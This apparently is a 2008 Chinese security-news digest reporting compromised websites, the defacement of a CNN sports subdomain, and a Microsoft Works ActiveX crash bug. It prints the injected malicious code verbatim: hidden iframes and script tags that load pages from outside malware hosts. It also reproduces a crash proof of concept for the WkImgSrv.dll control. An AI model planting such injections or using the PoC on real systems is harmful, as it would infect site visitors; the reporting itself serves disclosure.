北京志愿者协会（http://bva.bv2008.cn/）首页被插入恶意代码：

<Iframe src=http://wb.shijiediyi.net/one/hao8.htm?024 widtH=1 name=’4500′ HeigHt=1></iframe>

Popularity: 7% [?]

发布日期：2008-4-21

最后更新日期：2008-4-21   12：37（GMT）

CNN的分站（http://sports.si.cnn.com/）发布了一个声明：

Please Note

The Sports Network website and other major news sites have been hacked by a political entity from China, and as a result are temporarily unavailable. We apologize for any inconvenience and hope to be back up and running as soon as possible. Thank you for your patience and understanding.

Sports Network Management

根据这几天的关注，CNN的sports由于存在明显的注射漏洞，先后有很多人得到权限，对其页面进行涂改，而CNN网站的管理也在很短的时间内进行修复，一般没有超过20分钟，涂改页面就被恢复原状，但还是有一些黑客们留下了一些脚印和大名。

今天发现CNN的sports已经发布声明并且暂时关闭了，与这几天的侵入和涂改事件不无关系。

Popularity: 10% [?]

『爱好者之家』Ahaoz.CoM（http://www.itlove.net/mbsoft/1347/20070603102174.html）调用的JS：http://www.itlove.net/adfile/banner.js被插入恶意代码：

document.writeln(”<iframe src=\”http:\/\/w.195k.cn\/net\/net.htm?a001\” width=\”100\” height=\”0\” border=\”0\”><\/iframe>”)

Popularity: 5% [?]

来自neeao同学的报道

2008-4-20 15：17
http://sports.si.cnn.com/
首页又黑客被修改。
——————————————

2008-4-20 14：50
黑页地址为：
http://sports.si.cnn.com/homehacked.asp

2008-04-20 14:22:17
http://sports.si.cnn.com/

引用

西藏过去是，现在是，以后也将永远是中国的一部分！
Tibet WAS,IS,and ALWAYS WILL BE a part of China!

我们并不反对媒体本身，我们只反对媒体的不客观报道。
We are not against the western media, but against the lies and fabricated stories in the media.

我们并不反对西方人民，但是我们反对偏见。
We are not against the western people, but against the prejudice from the western society.!

Popularity: 23% [?]

中国IT实验室的登陆页面（http://download.chinaitlab.com/UserLogin.asp）被插入恶意代码：

<script src=http://sq1l.cn></script>

Popularity: 7% [?]

BT资源搜索（http://bit.mtsou.com/）被插入恶意代码：

<iframe src=http://gg.haoliuliang.com/one/hao1.htm?021 width=1 height=1></iframe>

Popularity: 5% [?]

浙北大厦购物中心（www.hzzhebei.com）被插入恶意代码：

http://51yes.ocry.com/click2.js?id=259865365&logo=1

Popularity: 7% [?]

发布日期：2008-4-17

最后更新日期：2008-4-17   21：37（GMT）

近几天网络上流传着一个传说为IE0DAY的POC代码，在XP系统环境下通杀了IE6和IE7，其它系统并未经过测试。其实这个漏洞并不是存在于IE，而是Microsoft Works的组件被挖掘出漏洞，部分的XP预装了Microsoft Works，所以就出现了过全补丁系统的漏洞（如华硕易PC 就预装了Microsoft Works）。影响的DLL版本：Microsoft Works 7 WkImgSrv.dll （7.03.0616.0）以下为crash POC，来自：http://hi.baidu.com/nansec/blog/item/299edffcd582d4f8fc037fb9.html

<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
    function payload() {
             var num = -1;
             obj.WksPictureInterface = num;
             }
   </script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>

来自：知道安全

Popularity: 10% [?]

搜泡泡（www.sopopo.com）被插入恶意代码：

<iframe src=”http://ca.winvv.com/cn.htm” width=0 height=0></iframe>

Popularity: 7% [?]

股票、证券、投资理财网-财富天下(www.whxld.com/)被插入恶意代码：

<iframe src=http://a.158dm.com/b3.htm width=0 height=0></iframe>

Popularity: 6% [?]